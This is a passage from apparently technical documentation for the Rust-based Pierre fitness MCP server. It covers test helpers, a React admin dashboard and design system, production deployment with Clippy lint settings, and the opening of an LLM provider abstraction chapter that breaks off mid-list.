- Deterministic: Seeded RNG ensures same data every run
- Realistic: Physiologically plausible activity data
- Fast: In-memory synthetic provider, no network calls
Usage example (tests/intelligence_synthetic_helpers_test.rs):
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_beginner_progression_algorithm() -> Result<()> {
let mut builder = SyntheticDataBuilder::new(42); // Deterministic seed
let activities = builder.generate_pattern(TrainingPattern::BeginnerRunnerImproving);
let provider = SyntheticProvider::with_activities(activities);
// Test intelligence algorithms without OAuth
let trends = analyze_performance_trends(&provider).await?;
assert!(trends.pace_improvement > 0.30); // Expect ~35% improvement
Ok(())
}
}
Test Helpers and Scenario Builders
Pierre provides reusable test helpers for common testing patterns.
Scenario-Based Testing
Source: tests/helpers/test_utils.rs:9-33
#![allow(unused)]
fn main() {
/// Test scenarios for intelligence testing
#[derive(Debug, Clone, Copy)]
pub enum TestScenario {
/// Beginner runner showing 35% improvement over 6 weeks
BeginnerRunnerImproving,
/// Experienced cyclist with stable, consistent performance
ExperiencedCyclistConsistent,
/// Athlete showing signs of overtraining (TSB < -30)
OvertrainingRisk,
/// Return from injury with gradual progression
InjuryRecovery,
}
impl TestScenario {
/// Get the corresponding pattern from synthetic data builder
#[must_use]
pub const fn to_training_pattern(self) -> TrainingPattern {
match self {
Self::BeginnerRunnerImproving => TrainingPattern::BeginnerRunnerImproving,
Self::ExperiencedCyclistConsistent => TrainingPattern::ExperiencedCyclistConsistent,
Self::OvertrainingRisk => TrainingPattern::Overtraining,
Self::InjuryRecovery => TrainingPattern::InjuryRecovery,
}
}
}
}
Scenario Provider Creation
Source: tests/helpers/test_utils.rs:35-42
#![allow(unused)]
fn main() {
/// Create a synthetic provider with pre-configured scenario data
#[must_use]
pub fn create_synthetic_provider_with_scenario(scenario: TestScenario) -> SyntheticProvider {
let mut builder = SyntheticDataBuilder::new(42); // Deterministic seed
let activities = builder.generate_pattern(scenario.to_training_pattern());
SyntheticProvider::with_activities(activities)
}
}
Usage:
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_overtraining_detection() -> Result<()> {
let provider = create_synthetic_provider_with_scenario(TestScenario::OvertrainingRisk);
let recovery = calculate_recovery_score(&provider).await?;
assert!(recovery.tsb < -30.0); // Overtraining threshold
Ok(())
}
}
Benefits:
- Readable tests: TestScenario::BeginnerRunnerImproving vs raw data construction
- Reusable: Same scenarios across multiple test files
- Maintainable: Change scenario in one place, all tests update
Error Testing Patterns
Test error conditions explicitly to validate error handling.
Testing Error Cases
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_duplicate_user_email_rejected() -> Result<()> {
let database = create_test_database().await?;
let user1 = User::new("duplicate@test.com".to_owned(), "hash1".to_owned(), None);
let user2 = User::new("duplicate@test.com".to_owned(), "hash2".to_owned(), None);
// First user succeeds
database.create_user(&user1).await?;
// Second user with same email fails
let result = database.create_user(&user2).await;
assert!(result.is_err());
// Verify error type
let err = result.unwrap_err();
assert!(err.to_string().contains("UNIQUE constraint"));
Ok(())
}
}
Testing Validation Errors
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_invalid_email_rejected() -> Result<()> {
use pierre_mcp_server::database_plugins::shared::validation::validate_email;
// Test various invalid email formats
let invalid_emails = vec![
"notanemail",
"@test.com",
"test@",
"a@b",
"",
];
for email in invalid_emails {
let result = validate_email(email);
assert!(result.is_err(), "Email '{}' should be invalid", email);
}
// Valid email passes
assert!(validate_email("valid@example.com").is_ok());
Ok(())
}
}
Pattern: Test both success path AND failure paths to ensure error handling works.
Test Organization
Pierre organizes tests by scope and type with 1,635 lines of test helper code.
Test directory structure:
tests/
├── helpers/ # 1,635 lines of shared test utilities
│ ├── synthetic_data.rs # Deterministic test data generation
│ ├── synthetic_provider.rs # In-memory provider for testing
│ └── test_utils.rs # Scenario builders and assertions
├── database_memory_test.rs # Database isolation tests
├── mcp_protocol_comprehensive_test.rs # MCP integration tests
├── admin_jwt_test.rs # JWT authentication tests
├── oauth_e2e_test.rs # OAuth flow E2E tests
├── intelligence_recovery_calculator_test.rs # Algorithm tests
├── pagination_test.rs # Pagination logic tests
├── configuration_profiles_test.rs # Config validation tests
└── [40+ additional test files]
Test categories:
- Database tests: In-memory isolation, transaction handling, migration validation
- Integration tests: MCP protocol, OAuth flows, provider interactions
- Algorithm tests: Recovery calculations, nutrition calculations, performance analysis
- E2E tests: Full user workflows from authentication to data retrieval
- Unit tests: Validation functions, enum conversions, mappers
Key Test Patterns
Pattern 1: Builder for test data
#![allow(unused)]
fn main() {
let activity = ActivityBuilder::new(SportType::Run)
.distance_km(10.0)
.duration_minutes(50)
.average_hr(150)
.build();
}
Pattern 2: Seeded RNG for determinism
#![allow(unused)]
fn main() {
let mut builder = SyntheticDataBuilder::new(42); // Same seed = same data
}
Pattern 3: Synthetic provider for isolation
#![allow(unused)]
fn main() {
let provider = SyntheticProvider::with_activities(vec![activity1, activity2]);
let result = service.analyze(&provider).await?;
}
Key Takeaways
- In-memory databases: sqlite::memory: provides fast, isolated tests without physical files or cleanup overhead.
- Database isolation: Each test gets an independent database instance, enabling safe parallel test execution.
- Test fixtures: Centralized helpers like create_test_database() ensure consistent test setup across all tests.
- Integration testing: MCP protocol tests validate component interactions (server → database → auth) without mocking.
- JSON-RPC helpers: create_mcp_request() and create_auth_mcp_request() simplify MCP protocol testing.
- Async testing: #[tokio::test] provides a multi-threaded async runtime for natural async/await syntax in tests.
- Concurrent testing: tokio::spawn validates thread safety by testing concurrent database writes and reads.
- Scenario-based testing: The TestScenario enum provides readable, reusable test scenarios (BeginnerRunnerImproving, OvertrainingRisk).
- Synthetic data: Deterministic test data with a seeded RNG (SyntheticDataBuilder::new(42)) ensures reproducible tests without OAuth.
- Error testing: Explicitly test failure paths (duplicate emails, invalid data) to validate that error handling works.
- Test organization: 1,635 lines of helper code in tests/helpers/ plus 40+ test files organized by category.
- Builder pattern: Fluent API for constructing test activities and data structures.
- Validation testing: Test shared validation functions (validate_email, validate_tenant_ownership) with multiple invalid inputs.
- No external dependencies: Tests run offline using in-memory databases and synthetic providers.
- Fast execution: In-memory databases + synthetic data = millisecond test times, enabling rapid development feedback.
Next Chapter: Chapter 24: Design System - Learn about Pierre’s design system, templates, frontend architecture, and user experience patterns.
Chapter 24: Design System - Frontend Dashboard, Templates & UX
This chapter covers Pierre’s design system including the React admin dashboard, OAuth templates, brand identity, and user experience patterns for fitness data visualization.
Frontend Admin Dashboard
Pierre includes a full-featured React admin dashboard for server management.
Technology stack:
- React 19 with TypeScript
- TailwindCSS for styling
- React Query for data fetching/caching
- Chart.js for analytics visualization
- WebSocket for real-time updates
- Vite for development/building
frontend/
├── src/
│ ├── App.tsx # Main application
│ ├── services/api.ts # Axios API client
│ ├── contexts/ # React contexts
│ │ ├── AuthContext.tsx # Auth state
│ │ └── WebSocketProvider.tsx # Real-time updates
│ ├── hooks/ # Custom hooks
│ │ ├── useAuth.ts # Auth hook
│ │ └── useWebSocket.ts # WebSocket hook
│ └── components/ # UI components (20+)
│ ├── Dashboard.tsx # Main dashboard
│ ├── UserManagement.tsx
│ ├── A2AManagement.tsx
│ └── ...
├── tailwind.config.js # Brand colors
└── BRAND.md # Design system docs
Dashboard Architecture
The dashboard uses lazy loading for performance optimization:
Source: frontend/src/components/Dashboard.tsx:12-18
// Lazy load heavy components to reduce initial bundle size
const OverviewTab = lazy(() => import('./OverviewTab'));
const UsageAnalytics = lazy(() => import('./UsageAnalytics'));
const RequestMonitor = lazy(() => import('./RequestMonitor'));
const ToolUsageBreakdown = lazy(() => import('./ToolUsageBreakdown'));
const UnifiedConnections = lazy(() => import('./UnifiedConnections'));
const UserManagement = lazy(() => import('./UserManagement'));
Dashboard tabs:
- Overview: System metrics, API key usage, health status
- Analytics: Request patterns, tool usage breakdown, trends
- Connections: Provider OAuth status, user connections
- Users: User approval, tenant management (admin only)
- A2A: Agent-to-Agent monitoring, client registration
API Service Layer
The API service handles CSRF protection and auth token management:
Source: frontend/src/services/api.ts:7-33
class ApiService {
private csrfToken: string | null = null;
constructor() {
axios.defaults.baseURL = API_BASE_URL;
axios.defaults.withCredentials = true;
this.setupInterceptors();
}
private setupInterceptors() {
// Add CSRF token for state-changing operations
axios.interceptors.request.use((config) => {
if (this.csrfToken && ['POST', 'PUT', 'DELETE'].includes(config.method?.toUpperCase() || '')) {
config.headers['X-CSRF-Token'] = this.csrfToken;
}
return config;
});
// Handle 401 errors (trigger logout)
axios.interceptors.response.use(
(response) => response,
(error) => {
if (error.response?.status === 401) {
this.handleAuthFailure();
}
return Promise.reject(error);
}
);
}
}
Real-Time Updates (WebSocket)
The dashboard receives live updates via WebSocket:
Source: frontend/src/components/Dashboard.tsx:76-80
// Refresh data when WebSocket updates are received
useEffect(() => {
if (lastMessage) {
if (lastMessage.type === 'usage_update' || lastMessage.type === 'system_stats') {
refetchOverview();
}
}
}, [lastMessage, refetchOverview]);
WebSocket message types:
- usage_update: API usage metrics changed
- system_stats: System health metrics updated
- connection_status: Provider connection changed
- user_approved: User approval status changed
Brand Identity
Pierre uses a “Three Pillars” design system representing holistic fitness:
Source: frontend/BRAND.md:15-20
| Pillar | Color | Hex | Usage |
|------------|---------|-----------|------------------------------|
| Activity | Emerald | #10B981 | Movement, fitness, energy |
| Nutrition | Amber | #F59E0B | Food, fuel, nourishment |
| Recovery | Indigo | #6366F1 | Rest, sleep, restoration |
Primary brand colors:
- Pierre Violet (#7C3AED): Intelligence, AI, sophistication
- Pierre Cyan (#06B6D4): Data flow, connectivity, freshness
TailwindCSS classes:
<!-- Primary colors -->
<div class="bg-pierre-violet">Intelligence</div>
<div class="bg-pierre-cyan">Data Flow</div>
<!-- Three Pillars -->
<Badge class="bg-pierre-activity">Running</Badge>
<Badge class="bg-pierre-nutrition">Calories</Badge>
<Badge class="bg-pierre-recovery">Sleep</Badge>
OAuth Templates
Pierre uses HTML templates for OAuth callback pages.
OAuth success template (templates/oauth_success.html):
<!DOCTYPE html>
<html>
<head>
<title>OAuth Success - Pierre Fitness</title>
<style>
body {
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
}
.container {
background: white;
padding: 40px;
border-radius: 12px;
box-shadow: 0 10px 40px rgba(0,0,0,0.2);
text-align: center;
}
h1 { color: #667eea; }
.success-icon { font-size: 64px; color: #10b981; }
</style>
</head>
<body>
<div class="container">
<div class="success-icon">✓</div>
<h1>Successfully Connected to {{PROVIDER}}</h1>
<p>You can now close this window and return to the app.</p>
<p>User ID: {{USER_ID}}</p>
</div>
</body>
</html>
Template rendering:
Source: src/oauth2_client/flow_manager.rs:11-26
#![allow(unused)]
fn main() {
pub struct OAuthTemplateRenderer;
impl OAuthTemplateRenderer {
pub fn render_success_template(
provider: &str,
callback_response: &OAuthCallbackResponse,
) -> Result<String, Box<dyn std::error::Error>> {
const TEMPLATE: &str = include_str!("../../templates/oauth_success.html");
let rendered = TEMPLATE
.replace("{{PROVIDER}}", provider)
.replace("{{USER_ID}}", &callback_response.user_id);
Ok(rendered)
}
}
}
Dashboard Components
Overview Tab
Displays system health, API key statistics, and quick metrics.
Usage Analytics
Chart.js visualizations for request patterns over time.
Request Monitor
Real-time feed of API requests with filtering and search.
Tool Usage Breakdown
Pie charts and tables showing which MCP tools are most used.
User Management (Admin)
- Approve/reject pending user registrations
- View user activity and connections
- Manage tenant assignments
A2A Management
- Register new A2A clients
- Monitor agent-to-agent communications
- View capability discovery logs
Development Setup
# Install dependencies
cd frontend
npm install
# Start development server (with Vite proxy to backend)
npm run dev
# Build for production
npm run build
# Run tests
npm test
# Type checking
npm run type-check
Vite proxy configuration (vite.config.ts):
export default defineConfig({
server: {
proxy: {
'/api': 'http://localhost:8081',
'/ws': {
target: 'ws://localhost:8081',
ws: true,
},
},
},
});
Key Takeaways
- React admin dashboard: Full-featured dashboard with 20+ components for server management.
- Lazy loading: Heavy components loaded on-demand for fast initial page load.
- React Query: Server state management with automatic caching and refetching.
- WebSocket: Real-time updates for live metrics and status changes.
- Three Pillars: Activity (emerald), Nutrition (amber), Recovery (indigo) color system.
- OAuth templates: HTML templates with {{PLACEHOLDER}} substitution for success/error pages.
- CSRF protection: API service automatically adds CSRF tokens to state-changing requests.
- TailwindCSS: Brand colors available as pierre-* utility classes.
Next Chapter: Chapter 25: Production Deployment, Clippy & Performance - Learn about production deployment strategies, Clippy lint configuration, performance optimization, and monitoring.
Chapter 25: Production Deployment, Clippy & Performance
This chapter covers production deployment strategies, Clippy lint configuration for code quality, performance optimization techniques, and monitoring best practices for Pierre.
Clippy Configuration
Pierre uses strict Clippy lints to maintain code quality with zero tolerance (deny level) for most warnings.
Source: Cargo.toml (lints section)
[lints.rust]
# STRICT UNSAFE CODE POLICY: Zero tolerance
unsafe_code = "deny"
missing_docs = "warn"
[lints.clippy]
# Base configuration: Enable all clippy lint groups at DENY level
# Priority -1 ensures these are applied first, then specific overrides below
all = { level = "deny", priority = -1 }
pedantic = { level = "deny", priority = -1 }
nursery = { level = "deny", priority = -1 }
# Critical Denials - Error Handling Anti-Patterns
unwrap_used = "deny"
expect_used = "deny"
panic = "deny"
# Allowed Exceptions (type casts with proper validation)
cast_possible_truncation = "allow"
cast_sign_loss = "allow"
cast_precision_loss = "allow"
# Const fn suggestions - false positives with runtime methods
missing_const_for_fn = "allow"
# Structural patterns - validated separately
struct_excessive_bools = "allow"
too_many_lines = "allow"
significant_drop_tightening = "allow"
# Additional code quality lints
clone_on_copy = "warn"
redundant_clone = "warn"
Lint configuration syntax (TOML inline tables):
- { level = "deny", priority = -1 }: table syntax with priority ordering
- Priority -1 means these base rules apply first, allowing specific overrides
- Simple values like "deny" or "allow" work for single-priority lints
Lint categories:
- all: Enable all Clippy lints (deny level = build errors)
- pedantic: Extra pedantic lints for code quality
- nursery: Experimental lints being tested
- Denials: unwrap_used, expect_used, and panic cause build failures
Why deny unwrap/expect: Prevents runtime panics in production. Use ? operator, .unwrap_or(), or proper error handling instead.
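As a quick illustration of those alternatives, here is a standalone sketch (not code from the Pierre codebase) showing the two patterns that keep the unwrap_used lint happy:

```rust
/// Propagate the error to the caller with `?` instead of panicking.
fn parse_port(raw: &str) -> Result<u16, std::num::ParseIntError> {
    let port: u16 = raw.trim().parse()?; // `?` returns early on error
    Ok(port)
}

/// Fall back to a default value instead of unwrapping.
fn port_or_default(raw: &str) -> u16 {
    raw.trim().parse().unwrap_or(8081)
}
```

Both compile cleanly under `unwrap_used = "deny"`, while `raw.parse().unwrap()` would fail the build.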
Why deny unsafe: Pierre has a zero-unsafe policy with only one approved exception (src/health.rs for Windows FFI).
Production Deployment
Pierre deployment architecture:
┌──────────────┐
│ Nginx │ (Reverse proxy, TLS termination)
└──────┬───────┘
│
┌──────▼───────┐
│ Pierre │ (Rust binary, multiple instances)
│ Server │
└──────┬───────┘
│
┌──────▼───────┐
│ PostgreSQL │ (Primary database)
└──────────────┘
Deployment checklist:
- Environment variables: Set DATABASE_URL, JWT_SECRET, OAUTH_* vars
- TLS certificates: Configure HTTPS with Let’s Encrypt
- Database migrations: Run sqlx migrate run
- Connection pooling: Set DATABASE_MAX_CONNECTIONS=20
- Logging: Configure RUST_LOG=info
- Monitoring: Enable Prometheus metrics endpoint
Performance Optimization
Database connection pooling:
#![allow(unused)]
fn main() {
let pool = PgPoolOptions::new()
.max_connections(20)
.acquire_timeout(Duration::from_secs(3))
.connect(&database_url)
.await?;
}
Query optimization:
- Indexes: Create indexes on user_id, provider, activity_date
- Prepared statements: Use SQLx compile-time verification
- Batch operations: Insert multiple activities in a single transaction
- Connection reuse: Pool connections, avoid per-request connections
Async runtime optimization:
[dependencies]
tokio = { version = "1", features = ["full"] }
Tokio configuration:
- Worker threads: Default = CPU cores
- Blocking threads: Separate pool for blocking operations
- Stack size: Increase if deep recursion needed
Monitoring
Metrics to track:
- Request latency: P50, P95, P99 response times
- Error rate: 4xx and 5xx responses per endpoint
- Database connections: Active, idle, waiting
- Memory usage: RSS, heap allocation
- OAuth success rate: Connection success vs failures
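P50/P95/P99 latencies come from a sorted sample of observed request times. A minimal nearest-rank sketch (illustrative only, not Pierre's metrics code):

```rust
/// Nearest-rank percentile over latency samples (milliseconds).
/// Returns None for an empty sample set.
fn percentile(samples: &mut [u64], p: f64) -> Option<u64> {
    if samples.is_empty() {
        return None;
    }
    samples.sort_unstable();
    // Nearest-rank method: ceil(p/100 * n), clamped to valid indices.
    let rank = ((p / 100.0) * samples.len() as f64).ceil() as usize;
    let idx = rank.saturating_sub(1).min(samples.len() - 1);
    Some(samples[idx])
}
```

In production you would feed this from a histogram (e.g., Prometheus) rather than keeping raw samples, but the definition of P95 is the same.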
Logging best practices:
#![allow(unused)]
fn main() {
tracing::info!(
user_id = %user_id,
provider = %provider,
activities_count = activities.len(),
"Successfully fetched activities"
);
}
Security Hardening
Production security:
- TLS only: Redirect HTTP to HTTPS
- CORS restrictions: Whitelist allowed origins
- Rate limiting: IP-based limits for public endpoints
- Input validation: Validate all user inputs
- SQL injection prevention: Use parameterized queries (SQLx)
- Secret management: Use environment variables or vault
- Audit logging: Log all authentication attempts
Environment configuration:
# Production environment variables
export DATABASE_URL="postgresql://user:pass@localhost/pierre"
export JWT_SECRET="$(openssl rand -base64 32)"
export RUST_LOG="info"
export HTTP_PORT="8081"
export CORS_ALLOWED_ORIGINS="https://app.pierre.ai"
Scaling Strategies
Horizontal scaling:
- Load balancer: Nginx/HAProxy distributes requests
- Multiple instances: Run 2-4 Pierre servers behind load balancer
- Session affinity: Not required (stateless JWT authentication)
Database scaling:
- Read replicas: Offload read-heavy queries
- Connection pooling: Limit connections per instance
- Caching: Redis for frequently accessed data
Performance targets:
- API latency: P95 < 200ms
- Database queries: P95 < 50ms
- OAuth flow: Complete in < 5 seconds
- Throughput: 1000 req/sec per instance
Key Takeaways
- Clippy lints: Strict lints (deny on unwrap, expect, panic) prevent common errors.
- Connection pooling: Reuse database connections for performance.
- Deployment architecture: Nginx → Pierre (multiple instances) → PostgreSQL.
- Monitoring: Track latency, errors, connections, memory.
- Security hardening: TLS, CORS, rate limiting, input validation.
- Horizontal scaling: Load balancer + multiple stateless instances.
- Environment config: Use env vars for secrets and configuration.
End of Part VII: Testing & Deployment
You’ve completed the testing and deployment section. You now understand:
- Testing framework with synthetic data (Chapter 23)
- Design system and templates (Chapter 24)
- Production deployment and performance (Chapter 25)
Next: Appendix A: Rust Idioms Reference - Quick reference for Rust idioms used throughout Pierre.
Chapter 26: LLM Provider Architecture
This chapter explores Pierre’s LLM (Large Language Model) provider abstraction layer, which enables pluggable AI model integration for chat functionality and recipe generation. The architecture mirrors the fitness provider SPI pattern, providing a consistent approach to external service integration.
Architecture Overview
The LLM module uses a runtime provider selector pattern. The ChatProvider enum wraps the underlying providers and selects based on the PIERRE_LLM_PROVIDER environment variable.
┌──────────────────────────────────────────────────────────────────────────────────────┐
│ Chat System │
│ ┌──────────────────────────────────────────────────────────────────────────────┐ │
│ │ ChatProvider │ │
│ │ Runtime selector: PIERRE_LLM_PROVIDER=groq|gemini|local|ollama|vllm │ │
│ └───────────────────────────────┬──────────────────────────────────────────────┘ │
│ │ │
│ ┌────────────────────────┼────────────────────────┐ │
│ │ │ │ │
│ ▼ ▼ ▼ │
│ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │
│ │ Gemini │ │ Groq │ │ Local │ │
│ │ Provider │ │ Provider │ │ Provider │ │
│ │ (vision, │ │ (fast LPU │ │ (Ollama, │ │
│ │ tools) │ │ inference) │ │ vLLM, etc) │ │
│ └──────┬──────┘ └──────┬──────┘ └──────┬──────┘ │
│ │ │ │ │
│ └────────────────────────┼────────────────────────┘ │
│ │ │
│ ▼ │
│ ┌───────────────────────────────┐ │
│ │ LlmProvider Trait │ │
│ │ ┌─────────────────────────┐ │ │
│ │ │ + name() │ │ │
│ │ │ + capabilities() │ │ │
│ │ │ + complete() │ │ │
│ │ │ + complete_stream() │ │ │
│ │ │ + health_check() │ │ │
│ │ └─────────────────────────┘ │ │
│ └───────────────────────────────┘ │
└──────────────────────────────────────────────────────────────────────────────────────┘
Module Structure
src/llm/
├── mod.rs # Trait definitions, types, registry, exports
├── provider.rs # ChatProvider enum (runtime selector)
├── gemini.rs # Google Gemini implementation
├── groq.rs # Groq LPU implementation
├── openai_compatible.rs # OpenAI-compatible API (Ollama, vLLM, LocalAI)
└── prompts/
└── mod.rs # System prompts (pierre_system.md)
Source: src/lib.rs
#![allow(unused)]
fn main() {
/// LLM provider abstraction for AI chat integration
pub mod llm;
}
Configuration
Environment Variables
| Variable | Description | Default |
|---|---|---|
| PIERRE_LLM_PROVIDER | Provider selector: groq, gemini, local, ollama, vllm, localai | groq |
| GROQ_API_KEY | Groq API key | Required for Groq |
| GEMINI_API_KEY | Google Gemini API key | Required for Gemini |
| LOCAL_LLM_BASE_URL | Base URL for OpenAI-compatible API | http://localhost:11434/v1 (Ollama) |
| LOCAL_LLM_MODEL | Model name for local provider | qwen2.5:14b-instruct |
| LOCAL_LLM_API_KEY | API key (optional for local servers) | None |
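The selection logic boils down to a mapping from the variable's value to a provider kind. A simplified sketch (the real LlmProviderType lives in src/config/environment.rs, and its handling of unrecognized values may differ):

```rust
/// Simplified sketch of the PIERRE_LLM_PROVIDER mapping.
#[derive(Debug, PartialEq, Eq)]
enum ProviderKind {
    Groq,
    Gemini,
    Local,
}

fn provider_from_value(value: Option<&str>) -> ProviderKind {
    match value.map(str::to_ascii_lowercase).as_deref() {
        Some("gemini") => ProviderKind::Gemini,
        // `local`, `ollama`, `vllm`, and `localai` all select the
        // OpenAI-compatible local provider.
        Some("local" | "ollama" | "vllm" | "localai") => ProviderKind::Local,
        // Unset falls back to the Groq default (this sketch also sends
        // unknown values there; the real code may reject them instead).
        _ => ProviderKind::Groq,
    }
}
```

At startup the value comes from `std::env::var("PIERRE_LLM_PROVIDER").ok()`.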
Provider Comparison
| Feature | Groq | Gemini | Local (OpenAI-compatible) |
|---|---|---|---|
| Default | ✓ | | |
| Streaming | ✓ | ✓ | ✓ |
| Function Calling | ✓ | ✓ | ✓ (model dependent) |
| Vision | ✗ | ✓ | Model dependent |
| JSON Mode | ✓ | ✓ | ✓ |
| System Messages | ✓ | ✓ | ✓ |
| Rate Limits | 12K TPM (free) | More generous | None (local) |
| Speed | Very fast (LPU) | Fast | Hardware dependent |
| Privacy | Cloud | Cloud | Local/Private |
| Cost | Free tier | Paid | Free (local hardware) |
Local Provider Backends
The Local provider supports any OpenAI-compatible API:
| Backend | Default URL | Notes |
|---|---|---|
| Ollama | http://localhost:11434/v1 | Default, easy setup |
| vLLM | http://localhost:8000/v1 | High-throughput serving |
| LocalAI | http://localhost:8080/v1 | Lightweight alternative |
| Text Generation Inference | http://localhost:8080/v1 | Hugging Face optimized |
Capability Detection with Bitflags
LLM providers have varying capabilities. We use bitflags for efficient storage and querying:
Source: src/llm/mod.rs
#![allow(unused)]
fn main() {
bitflags::bitflags! {
/// LLM provider capability flags using bitflags for efficient storage
#[derive(Debug, Clone, Copy, Default, PartialEq, Eq, Serialize, Deserialize)]
pub struct LlmCapabilities: u8 {
/// Provider supports streaming responses
const STREAMING = 0b0000_0001;
/// Provider supports function/tool calling
const FUNCTION_CALLING = 0b0000_0010;
/// Provider supports vision/image input
const VISION = 0b0000_0100;
/// Provider supports JSON mode output
const JSON_MODE = 0b0000_1000;
/// Provider supports system messages
const SYSTEM_MESSAGES = 0b0001_0000;
}
}
}
Helper methods:
#![allow(unused)]
fn main() {
impl LlmCapabilities {
/// Create capabilities for a basic text-only provider
pub const fn text_only() -> Self {
Self::STREAMING.union(Self::SYSTEM_MESSAGES)
}
/// Create capabilities for a full-featured provider
pub const fn full_featured() -> Self {
Self::STREAMING
.union(Self::FUNCTION_CALLING)
.union(Self::VISION)
.union(Self::JSON_MODE)
.union(Self::SYSTEM_MESSAGES)
}
/// Check if streaming is supported
pub const fn supports_streaming(&self) -> bool {
self.contains(Self::STREAMING)
}
}
}
Usage:
#![allow(unused)]
fn main() {
let caps = provider.capabilities();
if caps.supports_streaming() && caps.supports_function_calling() {
// Use advanced features
} else if caps.supports_streaming() {
// Use basic streaming
}
}
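Under the hood, the bitflags macro stores these flags in the raw u8, and the checks above reduce to plain bit operations. A hand-rolled equivalent, purely for illustration (the real type comes from the macro):

```rust
// What the bitflags-backed checks reduce to on the raw u8.
const STREAMING: u8 = 0b0000_0001;
const FUNCTION_CALLING: u8 = 0b0000_0010;
const SYSTEM_MESSAGES: u8 = 0b0001_0000;

/// `contains` is a masked equality test on the bits.
const fn contains(caps: u8, flag: u8) -> bool {
    caps & flag == flag
}

/// `union` is a bitwise OR, so `text_only()` is STREAMING | SYSTEM_MESSAGES.
const fn text_only() -> u8 {
    STREAMING | SYSTEM_MESSAGES
}
```

This is why a capability set fits in a single byte and why capability checks are branch-cheap.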
The LlmProvider Trait
The core abstraction that all providers implement:
Source: src/llm/mod.rs
#![allow(unused)]
fn main() {
/// Type alias for boxed stream of chat chunks
pub type ChatStream = Pin<Box<dyn Stream<Item = Result<StreamChunk, AppError>> + Send>>;
#[async_trait]
pub trait LlmProvider: Send + Sync {
/// Unique provider identifier (e.g., "gemini", "groq")
fn name(&self) -> &'static str;
/// Human-readable display name for the provider
fn display_name(&self) -> &'static str;
/// Provider capabilities (streaming, function calling, etc.)
fn capabilities(&self) -> LlmCapabilities;
/// Default model to use if not specified in request
fn default_model(&self) -> &'static str;
/// Available models for this provider
fn available_models(&self) -> &'static [&'static str];
/// Perform a chat completion (non-streaming)
async fn complete(&self, request: &ChatRequest) -> Result<ChatResponse, AppError>;
/// Perform a streaming chat completion
async fn complete_stream(&self, request: &ChatRequest) -> Result<ChatStream, AppError>;
/// Check if the provider is healthy and API key is valid
async fn health_check(&self) -> Result<bool, AppError>;
}
}
ChatProvider: Runtime Selection
The ChatProvider enum provides runtime provider selection based on environment configuration:
Source: src/llm/provider.rs
#![allow(unused)]
fn main() {
/// Unified chat provider that wraps Gemini, Groq, or Local providers
pub enum ChatProvider {
/// Google Gemini provider with full tool calling support
Gemini(GeminiProvider),
/// Groq provider for fast, cost-effective inference
Groq(GroqProvider),
/// Local LLM provider via OpenAI-compatible API (Ollama, vLLM, LocalAI)
Local(OpenAiCompatibleProvider),
}
impl ChatProvider {
/// Create a provider from environment configuration
///
/// Reads `PIERRE_LLM_PROVIDER` to determine which provider to use:
/// - `groq` (default): Creates `GroqProvider` (requires `GROQ_API_KEY`)
/// - `gemini`: Creates `GeminiProvider` (requires `GEMINI_API_KEY`)
/// - `local`/`ollama`/`vllm`/`localai`: Creates `OpenAiCompatibleProvider`
pub fn from_env() -> Result<Self, AppError> {
let provider_type = LlmProviderType::from_env();
info!(
"Initializing LLM provider: {} (set {} to change)",
provider_type,
LlmProviderType::ENV_VAR
);
match provider_type {
LlmProviderType::Groq => Self::groq(),
LlmProviderType::Gemini => Self::gemini(),
LlmProviderType::Local => Self::local(),
}
}
/// Create a local LLM provider (Ollama, vLLM, LocalAI)
pub fn local() -> Result<Self, AppError> {
Ok(Self::Local(OpenAiCompatibleProvider::from_env()?))
}
/// Create a Gemini provider explicitly
pub fn gemini() -> Result<Self, AppError> {
Ok(Self::Gemini(GeminiProvider::from_env()?))
}
/// Create a Groq provider explicitly
pub fn groq() -> Result<Self, AppError> {
Ok(Self::Groq(GroqProvider::from_env()?))
}
}
}
Message Types
MessageRole
Enum representing conversation roles:
#![allow(unused)]
fn main() {
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
pub enum MessageRole {
System,
User,
Assistant,
}
impl MessageRole {
pub const fn as_str(&self) -> &'static str {
match self {
Self::System => "system",
Self::User => "user",
Self::Assistant => "assistant",
}
}
}
}
ChatMessage
Individual message in a conversation:
#![allow(unused)]
fn main() {
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ChatMessage {
pub role: MessageRole,
pub content: String,
}
impl ChatMessage {
/// Create a system message
pub fn system(content: impl Into<String>) -> Self {
Self::new(MessageRole::System, content)
}
/// Create a user message
pub fn user(content: impl Into<String>) -> Self {
Self::new(MessageRole::User, content)
}
/// Create an assistant message
pub fn assistant(content: impl Into<String>) -> Self {
Self::new(MessageRole::Assistant, content)
}
}
}
ChatRequest (Builder Pattern)
Request configuration using the builder pattern:
#![allow(unused)]
fn main() {
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ChatRequest {
pub messages: Vec<ChatMessage>,
pub model: Option<String>,
pub temperature: Option<f32>,
pub max_tokens: Option<u32>,
pub stream: bool,
}
impl ChatRequest {
/// Create a new chat request with messages
pub const fn new(messages: Vec<ChatMessage>) -> Self {
Self {
messages,
model: None,
temperature: None,
max_tokens: None,
stream: false,
}
}
/// Set the model to use
pub fn with_model(mut self, model: impl Into<String>) -> Self {
self.model = Some(model.into());
self
}
/// Set the temperature (const fn - no allocation)
pub const fn with_temperature(mut self, temperature: f32) -> Self {
self.temperature = Some(temperature);
self
}
/// Set the maximum tokens (const fn)
pub const fn with_max_tokens(mut self, max_tokens: u32) -> Self {
self.max_tokens = Some(max_tokens);
self
}
/// Enable streaming (const fn)
pub const fn with_streaming(mut self) -> Self {
self.stream = true;
self
}
}
}
Groq Provider Implementation
The Groq provider uses an OpenAI-compatible API for fast inference:
Source: src/llm/groq.rs
Configuration
#![allow(unused)]
fn main() {
/// Environment variable for Groq API key
const GROQ_API_KEY_ENV: &str = "GROQ_API_KEY";
/// Default model to use
const DEFAULT_MODEL: &str = "llama-3.3-70b-versatile";
/// Available Groq models
const AVAILABLE_MODELS: &[&str] = &[
"llama-3.3-70b-versatile",
"llama-3.1-8b-instant",
"llama-3.1-70b-versatile",
"mixtral-8x7b-32768",
